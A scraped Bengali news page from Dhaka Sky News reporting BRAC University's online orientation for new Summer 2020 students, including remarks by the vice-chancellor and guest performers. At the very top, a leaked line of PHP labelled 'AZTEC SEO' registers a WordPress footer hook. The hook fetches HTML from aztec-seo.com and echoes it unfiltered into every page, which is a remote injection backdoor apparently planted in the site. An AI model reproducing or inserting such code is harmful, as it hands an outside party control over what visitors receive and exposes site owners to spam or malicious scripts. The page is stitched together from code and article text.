/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ব্র্যাক ইউনিভার্সিটি : অনলাইন ওরিয়েন্টেশন অনুষ্ঠিত | Dhaka Sky News

বর্ষায় ঘরের স্যাঁতসেঁতে অবস্থা যেভাবে দূর করবেন

আগের সংবাদ

হজে বিধিনিষেধ না মানলে ১০ হাজার রিয়াল জরিমানা

পরের সংবাদ

ব্র্যাক ইউনিভার্সিটি : অনলাইন ওরিয়েন্টেশন অনুষ্ঠিত

শেখ দৌলত আহমাদ

ঢাকা স্কাই নিউজ ডেস্ক প্রকাশিত: July 15, 2020 , 1:23 am

ব্র্যাক ইউনিভার্সিটি সামার-২০২০ সেমিস্টারের নবীন শিক্ষার্থীদের আনুষ্ঠানিকভাবে বরণ করেছে। কভিড-১৯ মহামারির কারণে গত শনিবার নতুন সেমিস্টারে ভর্তি শিক্ষার্থীদের অনলাইন ওরিয়েন্টেশন আয়োজন করে বিশ্ববিদ্যালয় কর্তৃপক্ষ।

সকাল ৯টায় এই অনুষ্ঠান শুরু হয়। সূচনা সঙ্গীতের পর ব্র্যাকের প্রতিষ্ঠাতা স্যার ফজলে হাসান আবেদ, কেসিএমজি এর জীবনের বিভিন্ন দিক ও অর্জন নিয়ে বিশেষ প্রামাণ্যচিত্র প্রদর্শিত হয়।

সূচনা বক্তব্য দেন বিশ্ববিদ্যালয়ের প্রক্টর আবদুল্লাহ রুবায়েত চৌধুরী। ব্র্যাক ইউনিভার্সিটির বিভিন্ন বিভাগ, অফিস সম্পর্কে ধারণা ও শিক্ষার্থীদের করণীয় বিষয়ে দিক নির্দেশনামূলক বক্তব্য দেন তিনি। সকাল ১০টায় শিক্ষার্থীদের বরণ করে নেন বিশ্ববিদ্যালয়ের উপাচার্য প্রফেসর ভিনসেন্ট চ্যাং, পিএইচডি।

তিনি বলেন, ‘বর্তমান অবস্থায় অনেক শিক্ষার্থীর জন্য পড়াশোনা শুরু করাটা কঠিন হবে। ব্র্যাক ইউনিভার্সিটির অনলাইন লার্নিং প্লাটফর্ম ‘বিউএক্স’ এবং স্টুডেন্টস অ্যাসিসটেন্ট ফান্ডের সদ্ব্যবহারের মাধ্যমে অত্যন্ত সূচারুরূপে দূরবর্তী শিক্ষণ অভিজ্ঞতা লাভ করা যাবে বলে আমরা আশা করছি।’

ব্র্যাক ইউনিভার্সিটিতে পড়ার অভিজ্ঞতা ও প্রাপ্তি তুলে ধরেন অনুষ্ঠানের বিশেষ অতিথি জনপ্রিয় গায়িকা ও অভিনয়শিল্পী সামিহা নুসরাত ও রাফিয়াথ রশীদ মিথিলা। সামাজিক মাধ্যম ফেসবুকে হ্যাশট্যাগ উইআরব্র্যাকইউ ২০২০ ডুডল পোস্টকার্ড শেয়ার করার মধ্য দিয়ে শেষ হয় ওরিয়েন্টেশন অনুষ্ঠানটি। সংবাদ বিজ্ঞপ্তি।